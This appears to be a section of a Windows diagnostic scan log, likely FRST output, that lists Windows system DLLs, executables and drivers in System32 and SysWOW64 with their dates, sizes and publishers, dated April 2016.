2016-04-15 22:24 - 2016-03-29 09:10 - 00938496 _____ (Microsoft Corporation) C:\Windows\system32\MapControlCore.dll
2016-04-15 22:24 - 2016-03-29 09:09 - 01239552 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Bluetooth.dll
2016-04-15 22:24 - 2016-03-29 09:09 - 00087040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MapsBtSvc.dll
2016-04-15 22:24 - 2016-03-29 09:09 - 00030208 _____ (Microsoft Corporation) C:\Windows\SysWOW64\tbauth.dll
2016-04-15 22:24 - 2016-03-29 09:08 - 00888320 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.dll
2016-04-15 22:24 - 2016-03-29 09:08 - 00841216 _____ (Microsoft Corporation) C:\Windows\system32\win32spl.dll
2016-04-15 22:24 - 2016-03-29 09:08 - 00118272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mtxoci.dll
2016-04-15 22:24 - 2016-03-29 09:07 - 01902592 _____ (Microsoft Corporation) C:\Windows\system32\msxml3.dll
2016-04-15 22:24 - 2016-03-29 09:07 - 01213440 _____ (Microsoft Corporation) C:\Windows\system32\wwansvc.dll
2016-04-15 22:24 - 2016-03-29 09:06 - 01575936 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.Speech.dll
2016-04-15 22:24 - 2016-03-29 09:06 - 00848896 _____ (Microsoft Corporation) C:\Windows\system32\wuapi.dll
2016-04-15 22:24 - 2016-03-29 09:06 - 00022528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBrokerCookies.exe
2016-04-15 22:24 - 2016-03-29 09:05 - 01395712 _____ (Microsoft Corporation) C:\Windows\system32\UIAutomationCore.dll
2016-04-15 22:24 - 2016-03-29 09:05 - 00052736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\OnDemandConnRouteHelper.dll
2016-04-15 22:24 - 2016-03-29 09:04 - 00103936 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Devices.dll
2016-04-15 22:24 - 2016-03-29 09:03 - 00148480 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dfsc.sys
2016-04-15 22:24 - 2016-03-29 09:02 - 01211904 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Cred.dll
2016-04-15 22:24 - 2016-03-29 09:02 - 00303104 _____ (Adobe Systems Incorporated) C:\Windows\SysWOW64\atmfd.dll
2016-04-15 22:24 - 2016-03-29 09:00 - 00235008 _____ C:\Windows\system32\MTF.dll
2016-04-15 22:24 - 2016-03-29 09:00 - 00176128 _____ (Microsoft Corporation) C:\Windows\system32\SystemSettings.DeviceEncryptionHandlers.dll
2016-04-15 22:24 - 2016-03-29 09:00 - 00175616 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Core.TextInput.dll
2016-04-15 22:24 - 2016-03-29 08:59 - 00223232 _____ (Microsoft Corporation) C:\Windows\system32\fveapibase.dll
2016-04-15 22:24 - 2016-03-29 08:59 - 00119808 _____ (Microsoft Corporation) C:\Windows\system32\BitLockerDeviceEncryption.exe
2016-04-15 22:24 - 2016-03-29 08:59 - 00108544 _____ (Microsoft Corporation) C:\Windows\system32\InputLocaleManager.dll
2016-04-15 22:24 - 2016-03-29 08:56 - 00821760 _____ (Microsoft Corporation) C:\Windows\system32\TokenBroker.dll
2016-04-15 22:24 - 2016-03-29 08:56 - 00415232 _____ (Microsoft Corporation) C:\Windows\SysWOW64\StoreAgent.dll
2016-04-15 22:24 - 2016-03-29 08:55 - 01052160 _____ (Microsoft Corporation) C:\Windows\system32\MsSpellCheckingFacility.dll
2016-04-15 22:24 - 2016-03-29 08:53 - 00323072 _____ (Microsoft Corporation) C:\Windows\SysWOW64\oleacc.dll
2016-04-15 22:24 - 2016-03-29 08:53 - 00193024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\credprovhost.dll
2016-04-15 22:24 - 2016-03-29 08:52 - 00306176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ieproxy.dll
2016-04-15 22:24 - 2016-03-29 08:52 - 00141824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\easwrt.dll
2016-04-15 22:24 - 2016-03-29 08:49 - 00288256 _____ (Microsoft Corporation) C:\Windows\system32\fveui.dll
2016-04-15 22:24 - 2016-03-29 08:48 - 00346624 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MapConfiguration.dll
2016-04-15 22:24 - 2016-03-29 08:44 - 00498176 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MessagingDataModel2.dll
2016-04-15 22:24 - 2016-03-29 08:43 - 00358400 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AccountsRt.dll
2016-04-15 22:24 - 2016-03-29 08:42 - 01410560 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Web.Http.dll
2016-04-15 22:24 - 2016-03-29 08:42 - 00250880 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.TestingFramework.dll
2016-04-15 22:24 - 2016-03-29 08:41 - 00129024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AboveLockAppHost.dll
2016-04-15 22:24 - 2016-03-29 08:40 - 00787456 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Web.dll
2016-04-15 22:24 - 2016-03-29 08:39 - 00564224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WSDApi.dll
2016-04-15 22:24 - 2016-03-29 08:39 - 00496128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Security.Authentication.Web.Core.dll
2016-04-15 22:24 - 2016-03-29 08:39 - 00350720 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CredProvDataModel.dll
2016-04-15 22:24 - 2016-03-29 08:38 - 00800768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\JpMapControl.dll
2016-04-15 22:24 - 2016-03-29 08:37 - 01444352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SRHInproc.dll
2016-04-15 22:24 - 2016-03-29 08:37 - 00799744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SRH.dll
2016-04-15 22:24 - 2016-03-29 08:36 - 03351040 _____ (Microsoft Corporation) C:\Windows\system32\msi.dll
2016-04-15 22:24 - 2016-03-29 08:36 - 00649728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.ApplicationModel.Store.dll
2016-04-15 22:24 - 2016-03-29 08:35 - 00354304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NetSetupShim.dll
2016-04-15 22:24 - 2016-03-29 08:34 - 00784896 _____ (Microsoft Corporation) C:\Windows\SysWOW64\NMAA.dll
2016-04-15 22:24 - 2016-03-29 08:34 - 00711680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MapControlCore.dll
2016-04-15 22:24 - 2016-03-29 08:34 - 00682496 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Input.Inking.dll
2016-04-15 22:24 - 2016-03-29 08:34 - 00418304 _____ (Microsoft Corporation) C:\Windows\system32\dmenrollengine.dll
2016-04-15 22:24 - 2016-03-29 08:32 - 01588224 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msxml3.dll
2016-04-15 22:24 - 2016-03-29 08:32 - 01098240 _____ (Microsoft Corporation) C:\Windows\system32\dosvc.dll
2016-04-15 22:24 - 2016-03-29 08:32 - 00854528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Bluetooth.dll
2016-04-15 22:24 - 2016-03-29 08:32 - 00638464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.dll
2016-04-15 22:24 - 2016-03-29 08:32 - 00176640 _____ (Microsoft Corporation) C:\Windows\system32\mdmregistration.dll
2016-04-15 22:24 - 2016-03-29 08:32 - 00162816 _____ (Microsoft Corporation) C:\Windows\system32\enrollmentapi.dll
2016-04-15 22:24 - 2016-03-29 08:32 - 00128512 _____ (Microsoft Corporation) C:\Windows\system32\dmcsps.dll
2016-04-15 22:24 - 2016-03-29 08:31 - 01117184 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.Speech.dll
2016-04-15 22:24 - 2016-03-29 08:31 - 00705536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wuapi.dll
2016-04-15 22:24 - 2016-03-29 08:30 - 01139712 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UIAutomationCore.dll
2016-04-15 22:24 - 2016-03-29 08:29 - 00555520 _____ (Microsoft Corporation) C:\Windows\system32\SyncController.dll
2016-04-15 22:24 - 2016-03-29 08:29 - 00256000 _____ (Microsoft Corporation) C:\Windows\system32\accountaccessor.dll
2016-04-15 22:24 - 2016-03-29 08:28 - 00764928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Cred.dll
2016-04-15 22:24 - 2016-03-29 08:27 - 07979008 _____ (Microsoft Corporation) C:\Windows\system32\mos.dll
2016-04-15 22:24 - 2016-03-29 08:27 - 00162816 _____ C:\Windows\SysWOW64\MTF.dll
2016-04-15 22:24 - 2016-03-29 08:27 - 00133632 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Core.TextInput.dll
2016-04-15 22:24 - 2016-03-29 08:27 - 00083456 _____ (Microsoft Corporation) C:\Windows\SysWOW64\InputLocaleManager.dll
2016-04-15 22:24 - 2016-03-29 08:23 - 00777728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\MsSpellCheckingFacility.dll
2016-04-15 22:24 - 2016-03-29 08:22 - 00638464 _____ (Microsoft Corporation) C:\Windows\SysWOW64\TokenBroker.dll
2016-04-15 22:24 - 2016-03-29 08:19 - 02635776 _____ (Microsoft Corporation) C:\Windows\system32\Windows.UI.Logon.dll
2016-04-15 22:24 - 2016-03-29 08:17 - 00765952 _____ (Microsoft Corporation) C:\Windows\system32\fveapi.dll
2016-04-15 22:24 - 2016-03-29 08:14 - 01072128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Web.Http.dll
2016-04-15 22:24 - 2016-03-29 08:13 - 00592384 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Web.dll
2016-04-15 22:24 - 2016-03-29 08:10 - 03671040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\msi.dll
2016-04-15 22:24 - 2016-03-29 08:06 - 00151040 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mdmregistration.dll
2016-04-15 22:24 - 2016-03-29 08:05 - 07199232 _____ (Microsoft Corporation) C:\Windows\system32\BingMaps.dll
2016-04-15 22:24 - 2016-03-29 08:05 - 00450560 _____ (Microsoft Corporation) C:\Windows\SysWOW64\SyncController.dll
2016-04-15 22:24 - 2016-03-29 08:05 - 00361472 _____ (Microsoft Corporation) C:\Windows\system32\bdesvc.dll
2016-04-15 22:24 - 2016-03-29 08:04 - 00848896 _____ (Microsoft Corporation) C:\Windows\system32\samsrv.dll
2016-04-15 22:24 - 2016-03-29 08:04 - 00688640 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Networking.Connectivity.dll
2016-04-15 22:24 - 2016-03-29 08:01 - 00957952 _____ (Microsoft Corporation) C:\Windows\system32\IKEEXT.DLL
2016-04-15 22:24 - 2016-03-29 08:00 - 06297088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mos.dll
2016-04-15 22:24 - 2016-03-29 07:58 - 01799680 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.UI.Logon.dll
2016-04-15 22:24 - 2016-03-29 07:49 - 05202944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\BingMaps.dll
2016-04-15 22:24 - 2016-03-29 07:45 - 03078144 _____ (Microsoft Corporation) C:\Windows\system32\esent.dll
2016-04-15 22:24 - 2016-03-29 07:45 - 00338432 _____ (Microsoft Corporation) C:\Windows\system32\ncbservice.dll
2016-04-15 22:24 - 2016-03-29 07:43 - 03428864 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Media.dll
2016-04-15 22:24 - 2016-03-29 07:43 - 00521728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Networking.Connectivity.dll
2016-04-15 22:24 - 2016-03-29 07:38 - 02798080 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Media.dll
2016-04-15 22:24 - 2016-03-29 07:36 - 02722816 _____ (Microsoft Corporation) C:\Windows\SysWOW64\esent.dll
2016-04-15 22:24 - 2016-03-29 07:35 - 00821248 _____ (Microsoft Corporation) C:\Windows\system32\fvewiz.dll
2016-04-15 22:24 - 2016-03-29 07:28 - 00324608 _____ (Microsoft Corporation) C:\Windows\system32\fvecpl.dll
2016-04-15 22:24 - 2016-03-29 07:27 - 00794112 _____ (Microsoft Corporation) C:\Windows\system32\BFE.DLL
2016-04-15 22:24 - 2016-03-29 07:26 - 00958976 _____ (Microsoft Corporation) C:\Windows\system32\RemoteNaturalLanguage.dll
2016-04-15 22:24 - 2016-03-29 07:26 - 00402432 _____ (Microsoft Corporation) C:\Windows\system32\FWPUCLNT.DLL
2016-04-15 22:24 - 2016-03-29 07:25 - 00712704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\RemoteNaturalLanguage.dll
2016-04-15 22:24 - 2016-03-29 07:25 - 00269824 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FWPUCLNT.DLL
2016-04-15 22:24 - 2016-03-29 07:21 - 00065536 _____ (Microsoft Corporation) C:\Windows\system32\basesrv.dll
2016-04-15 22:24 - 2016-03-01 07:31 - 00848168 _____ (Microsoft Corporation) C:\Windows\system32\mfsvr.dll
2016-04-15 22:24 - 2016-03-01 07:22 - 00709688 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfsvr.dll
2016-04-15 22:24 - 2016-02-24 11:52 - 01997328 _____ (Microsoft Corporation) C:\Windows\system32\KernelBase.dll
2016-04-15 22:24 - 2016-02-24 11:34 - 01613664 _____ (Microsoft Corporation) C:\Windows\system32\diagtrack.dll
2016-04-15 22:24 - 2016-02-24 11:15 - 01557768 _____ (Microsoft Corporation) C:\Windows\SysWOW64\KernelBase.dll
2016-04-15 22:24 - 2016-02-24 10:58 - 00794888 _____ (Microsoft Corporation) C:\Windows\system32\mfds.dll
2016-04-15 22:24 - 2016-02-24 10:54 - 00127840 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\USBSTOR.SYS
2016-04-15 22:24 - 2016-02-24 10:51 - 01322248 _____ (Microsoft Corporation) C:\Windows\system32\ole32.dll
2016-04-15 22:24 - 2016-02-24 10:50 - 00808800 _____ (Microsoft Corporation) C:\Windows\system32\WWAHost.exe
2016-04-15 22:24 - 2016-02-24 10:43 - 00625000 _____ (Microsoft Corporation) C:\Windows\system32\ClipSVC.dll
2016-04-15 22:24 - 2016-02-24 10:39 - 00141560 _____ (Microsoft Corporation) C:\Windows\system32\AuthHost.exe
2016-04-15 22:24 - 2016-02-24 10:19 - 00670928 _____ (Microsoft Corporation) C:\Windows\SysWOW64\mfds.dll
2016-04-15 22:24 - 2016-02-24 10:14 - 00216416 _____ (Microsoft Corporation) C:\Windows\system32\AppxAllUserStore.dll
2016-04-15 22:24 - 2016-02-24 10:11 - 00957608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ole32.dll
2016-04-15 22:24 - 2016-02-24 10:11 - 00703840 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WWAHost.exe
2016-04-15 22:24 - 2016-02-24 10:11 - 00652392 _____ (Microsoft Corporation) C:\Windows\system32\dxgi.dll
2016-04-15 22:24 - 2016-02-24 10:11 - 00394080 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms1.sys
2016-04-15 22:24 - 2016-02-24 10:11 - 00258280 _____ (Microsoft Corporation) C:\Windows\system32\sqmapi.dll
2016-04-15 22:24 - 2016-02-24 10:10 - 00576864 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\dxgmms2.sys
2016-04-15 22:24 - 2016-02-24 10:09 - 00640472 _____ (Microsoft Corporation) C:\Windows\system32\wer.dll
2016-04-15 22:24 - 2016-02-24 10:09 - 00147808 _____ (Microsoft Corporation) C:\Windows\system32\wermgr.exe
2016-04-15 22:24 - 2016-02-24 09:39 - 00045568 _____ (Microsoft Corporation) C:\Windows\system32\UserDataTypeHelperUtil.dll
2016-04-15 22:24 - 2016-02-24 09:39 - 00023552 _____ (Microsoft Corporation) C:\Windows\system32\ExtrasXmlParser.dll
2016-04-15 22:24 - 2016-02-24 09:38 - 00187744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxAllUserStore.dll
2016-04-15 22:24 - 2016-02-24 09:38 - 00111616 _____ (Microsoft Corporation) C:\Windows\system32\UserDataTimeUtil.dll
2016-04-15 22:24 - 2016-02-24 09:37 - 00045056 _____ (Microsoft Corporation) C:\Windows\system32\UserDataLanguageUtil.dll
2016-04-15 22:24 - 2016-02-24 09:36 - 00060416 _____ (Microsoft Corporation) C:\Windows\system32\PimIndexMaintenanceClient.dll
2016-04-15 22:24 - 2016-02-24 09:35 - 00523752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\dxgi.dll
2016-04-15 22:24 - 2016-02-24 09:35 - 00220064 _____ (Microsoft Corporation) C:\Windows\SysWOW64\sqmapi.dll
2016-04-15 22:24 - 2016-02-24 09:33 - 00538736 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wer.dll
2016-04-15 22:24 - 2016-02-24 09:33 - 00141664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wermgr.exe
2016-04-15 22:24 - 2016-02-24 09:30 - 00025600 _____ (Microsoft Corporation) C:\Windows\system32\wfapigp.dll
2016-04-15 22:24 - 2016-02-24 09:28 - 00070656 _____ (Microsoft Corporation) C:\Windows\system32\POSyncServices.dll
2016-04-15 22:24 - 2016-02-24 09:23 - 00091648 _____ (Microsoft Corporation) C:\Windows\system32\asycfilt.dll
2016-04-15 22:24 - 2016-02-24 09:23 - 00068096 _____ (Microsoft Corporation) C:\Windows\system32\UserDataPlatformHelperUtil.dll
2016-04-15 22:24 - 2016-02-24 09:22 - 00196608 _____ (Microsoft Corporation) C:\Windows\system32\fwpolicyiomgr.dll
2016-04-15 22:24 - 2016-02-24 09:20 - 00195072 _____ (Microsoft Corporation) C:\Windows\system32\VCardParser.dll
2016-04-15 22:24 - 2016-02-24 09:19 - 00145408 _____ (Microsoft Corporation) C:\Windows\system32\dssvc.dll
2016-04-15 22:24 - 2016-02-24 09:19 - 00031232 _____ (Microsoft Corporation) C:\Windows\system32\seclogon.dll
2016-04-15 22:24 - 2016-02-24 09:14 - 00274944 _____ (Microsoft Corporation) C:\Windows\system32\ExSMime.dll
2016-04-15 22:24 - 2016-02-24 09:13 - 00121856 _____ (Microsoft Corporation) C:\Windows\system32\AppointmentActivation.dll
2016-04-15 22:24 - 2016-02-24 09:12 - 00243712 _____ (Microsoft Corporation) C:\Windows\system32\cemapi.dll
2016-04-15 22:24 - 2016-02-24 09:12 - 00221184 _____ (Microsoft Corporation) C:\Windows\system32\PhoneCallHistoryApis.dll
2016-04-15 22:24 - 2016-02-24 09:10 - 00093184 _____ (Microsoft Corporation) C:\Windows\system32\wpninprc.dll
2016-04-15 22:24 - 2016-02-24 09:09 - 00258560 _____ (Microsoft Corporation) C:\Windows\system32\UserDataAccountApis.dll
2016-04-15 22:24 - 2016-02-24 09:09 - 00161792 _____ (Microsoft Corporation) C:\Windows\system32\AppxSip.dll
2016-04-15 22:24 - 2016-02-24 09:07 - 00252928 _____ (Microsoft Corporation) C:\Windows\system32\PimIndexMaintenance.dll
2016-04-15 22:24 - 2016-02-24 09:03 - 00088576 _____ (Microsoft Corporation) C:\Windows\SysWOW64\olepro32.dll
2016-04-15 22:24 - 2016-02-24 09:02 - 00161280 _____ (Microsoft Corporation) C:\Windows\system32\CallHistoryClient.dll
2016-04-15 22:24 - 2016-02-24 09:01 - 00146432 _____ (Microsoft Corporation) C:\Windows\system32\AuthBroker.dll
2016-04-15 22:24 - 2016-02-24 09:01 - 00067584 _____ (Microsoft Corporation) C:\Windows\system32\profext.dll
2016-04-15 22:24 - 2016-02-24 09:00 - 00214528 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Devices.Scanners.dll
2016-04-15 22:24 - 2016-02-24 08:59 - 00450560 _____ (Microsoft Corporation) C:\Windows\system32\Windows.Internal.Bluetooth.dll
2016-04-15 22:24 - 2016-02-24 08:59 - 00360448 _____ (Microsoft Corporation) C:\Windows\system32\vaultsvc.dll
2016-04-15 22:24 - 2016-02-24 08:59 - 00318976 _____ (Microsoft Corporation) C:\Windows\system32\domgmt.dll
2016-04-15 22:24 - 2016-02-24 08:58 - 00685568 _____ (Microsoft Corporation) C:\Windows\system32\scapi.dll
2016-04-15 22:24 - 2016-02-24 08:55 - 00790528 _____ (Microsoft Corporation) C:\Windows\system32\EmailApis.dll
2016-04-15 22:24 - 2016-02-24 08:55 - 00224256 _____ (Microsoft Corporation) C:\Windows\system32\PackageStateRoaming.dll
2016-04-15 22:24 - 2016-02-24 08:55 - 00018944 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExtrasXmlParser.dll
2016-04-15 22:24 - 2016-02-24 08:54 - 00526336 _____ (Microsoft Corporation) C:\Windows\system32\FirewallAPI.dll
2016-04-15 22:24 - 2016-02-24 08:54 - 00288768 _____ (Microsoft Corporation) C:\Windows\system32\vaultcli.dll
2016-04-15 22:24 - 2016-02-24 08:54 - 00228352 _____ (Microsoft Corporation) C:\Windows\system32\wsqmcons.exe
2016-04-15 22:24 - 2016-02-24 08:54 - 00037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataTypeHelperUtil.dll
2016-04-15 22:24 - 2016-02-24 08:53 - 00089088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataTimeUtil.dll
2016-04-15 22:24 - 2016-02-24 08:53 - 00037888 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataLanguageUtil.dll
2016-04-15 22:24 - 2016-02-24 08:52 - 00451584 _____ (Microsoft Corporation) C:\Windows\system32\werui.dll
2016-04-15 22:24 - 2016-02-24 08:52 - 00048128 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PimIndexMaintenanceClient.dll
2016-04-15 22:24 - 2016-02-24 08:49 - 00726528 _____ (Microsoft Corporation) C:\Windows\system32\ChatApis.dll
2016-04-15 22:24 - 2016-02-24 08:46 - 00020480 _____ (Microsoft Corporation) C:\Windows\SysWOW64\wfapigp.dll
2016-04-15 22:24 - 2016-02-24 08:44 - 00915456 _____ (Microsoft Corporation) C:\Windows\system32\configurationclient.dll
2016-04-15 22:24 - 2016-02-24 08:44 - 00700416 _____ (Microsoft Corporation) C:\Windows\system32\AppointmentApis.dll
2016-04-15 22:24 - 2016-02-24 08:44 - 00056320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\POSyncServices.dll
2016-04-15 22:24 - 2016-02-24 08:43 - 00286720 _____ (Microsoft Corporation) C:\Windows\system32\deviceaccess.dll
2016-04-15 22:24 - 2016-02-24 08:41 - 00982016 _____ (Microsoft Corporation) C:\Windows\system32\AppxPackaging.dll
2016-04-15 22:24 - 2016-02-24 08:41 - 00436736 _____ (Microsoft Corporation) C:\Windows\system32\AppXDeploymentClient.dll
2016-04-15 22:24 - 2016-02-24 08:40 - 01224704 _____ (Microsoft Corporation) C:\Windows\system32\Unistore.dll
2016-04-15 22:24 - 2016-02-24 08:40 - 00078848 _____ (Microsoft Corporation) C:\Windows\SysWOW64\asycfilt.dll
2016-04-15 22:24 - 2016-02-24 08:40 - 00056320 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataPlatformHelperUtil.dll
2016-04-15 22:24 - 2016-02-24 08:39 - 00164864 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fwpolicyiomgr.dll
2016-04-15 22:24 - 2016-02-24 08:38 - 00150528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\VCardParser.dll
2016-04-15 22:24 - 2016-02-24 08:36 - 01847808 _____ (Microsoft Corporation) C:\Windows\system32\WMPDMC.exe
2016-04-15 22:24 - 2016-02-24 08:34 - 00938496 _____ (Microsoft Corporation) C:\Windows\system32\ContactApis.dll
2016-04-15 22:24 - 2016-02-24 08:32 - 00223744 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ExSMime.dll
2016-04-15 22:24 - 2016-02-24 08:32 - 00098304 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppointmentActivation.dll
2016-04-15 22:24 - 2016-02-24 08:31 - 00200704 _____ (Microsoft Corporation) C:\Windows\SysWOW64\cemapi.dll
2016-04-15 22:24 - 2016-02-24 08:31 - 00169984 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PhoneCallHistoryApis.dll
2016-04-15 22:24 - 2016-02-24 08:28 - 00870912 _____ (Microsoft Corporation) C:\Windows\system32\MPSSVC.dll
2016-04-15 22:24 - 2016-02-24 08:28 - 00196608 _____ (Microsoft Corporation) C:\Windows\SysWOW64\UserDataAccountApis.dll
2016-04-15 22:24 - 2016-02-24 08:28 - 00135168 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxSip.dll
2016-04-15 22:24 - 2016-02-24 08:25 - 00401408 _____ (Microsoft Corporation) C:\Windows\system32\sharemediacpl.dll
2016-04-15 22:24 - 2016-02-24 08:23 - 00129024 _____ (Microsoft Corporation) C:\Windows\SysWOW64\CallHistoryClient.dll
2016-04-15 22:24 - 2016-02-24 08:22 - 00053248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\profext.dll
2016-04-15 22:24 - 2016-02-24 08:21 - 00315904 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Internal.Bluetooth.dll
2016-04-15 22:24 - 2016-02-24 08:21 - 00168448 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Devices.Scanners.dll
2016-04-15 22:24 - 2016-02-24 08:18 - 01490432 _____ (Microsoft Corporation) C:\Windows\system32\UserDataService.dll
2016-04-15 22:24 - 2016-02-24 08:18 - 00575488 _____ (Microsoft Corporation) C:\Windows\SysWOW64\EmailApis.dll
2016-04-15 22:24 - 2016-02-24 08:18 - 00184832 _____ (Microsoft Corporation) C:\Windows\SysWOW64\PackageStateRoaming.dll
2016-04-15 22:24 - 2016-02-24 08:17 - 00369664 _____ (Microsoft Corporation) C:\Windows\SysWOW64\FirewallAPI.dll
2016-04-15 22:24 - 2016-02-24 08:16 - 00394752 _____ (Microsoft Corporation) C:\Windows\SysWOW64\werui.dll
2016-04-15 22:24 - 2016-02-24 08:13 - 00540160 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ChatApis.dll
2016-04-15 22:24 - 2016-02-24 08:09 - 00552960 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppointmentApis.dll
2016-04-15 22:24 - 2016-02-24 08:09 - 00228352 _____ (Microsoft Corporation) C:\Windows\SysWOW64\deviceaccess.dll
2016-04-15 22:24 - 2016-02-24 08:07 - 00949248 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Unistore.dll
2016-04-15 22:24 - 2016-02-24 08:07 - 00890368 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppxPackaging.dll
2016-04-15 22:24 - 2016-02-24 08:07 - 00342528 _____ (Microsoft Corporation) C:\Windows\SysWOW64\AppXDeploymentClient.dll
2016-04-15 22:24 - 2016-02-24 08:04 - 01497088 _____ (Microsoft Corporation) C:\Windows\SysWOW64\WMPDMC.exe
2016-04-15 22:24 - 2016-02-24 08:03 - 00769536 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ContactApis.dll
2016-04-15 22:24 - 2016-02-24 07:55 - 01996288 _____ (Microsoft Corporation) C:\Windows\system32\ActiveSyncProvider.dll
2016-04-15 22:24 - 2016-02-24 07:43 - 00184320 _____ (Microsoft Corporation) C:\Windows\system32\fwbase.dll
2016-04-15 22:24 - 2016-02-24 07:34 - 01707520 _____ (Microsoft Corporation) C:\Windows\SysWOW64\ActiveSyncProvider.dll
2016-04-15 22:24 - 2016-02-24 07:22 - 00163328 _____ (Microsoft Corporation) C:\Windows\SysWOW64\fwbase.dll
2016-04-15 22:24 - 2016-02-24 07:12 - 05321728 _____ (Microsoft Corporation) C:\Windows\SysWOW64\Windows.Data.Pdf.dll
2016-04-15 22:24 - 2016-02-23 13:25 - 00563552 _____ (Microsoft Corporation) C:\Windows\system32\Drivers\acpi.sys
2016-04-15 22:24 - 2016-02-23 13:15 - 00779384 _____ (Microsoft Corporation) C:\Windows\system32\taskschd.dll
2016-04-15 22:24 - 2016-02-23 12:33 - 00389992 _____ (Microsoft Corporation) C:\Windows\system32\wlanapi.dll
2016-04-15 22:24 - 2016-02-23 12:32 - 02544264 _____ (Microsoft Corporation) C:\Windows\system32\mfcore.dll
2016-04-15 22:24 - 2016-02-23 12:32 - 01152328 _____ (Microsoft Corporation) C:\Windows\system32\mfasfsrcsnk.dll
2016-04-15 22:24 - 2016-02-23 12:32 - 01062480 _____ (Microsoft Corporation) C:\Windows\system32\mfmp4srcsnk.dll
2016-04-15 22:24 - 2016-02-23 12:32 - 00498448 _____ (Microsoft Corporation) C:\Windows\system32\MFCaptureEngine.dll
2016-04-15 22:24 - 2016-02-23 12:31 - 01017032 _____ (Microsoft Corporation) C:\Windows\system32\mfsrcsnk.dll
2016-04-15 22:24 - 2016-02-23 12:31 - 00819648 _____ (Microsoft Corporation) C:\Windows\system32\mfmpeg2srcsnk.dll
2016-04-15 22:24 - 2016-02-23 12:31 - 00476728 _____ (Microsoft Corporation) C:\Windows\system32\msvproc.dll
2016-04-15 22:24 - 2016-02-23 12:25 - 03671888 _____ (Microsoft Corporation) C:\Windows\system32\iertutil.dll
2016-04-15 22:24 - 2016-02-23 12:22 - 00572272 _____ (Microsoft Corporation) C:\Windows\SysWOW64\taskschd.dll
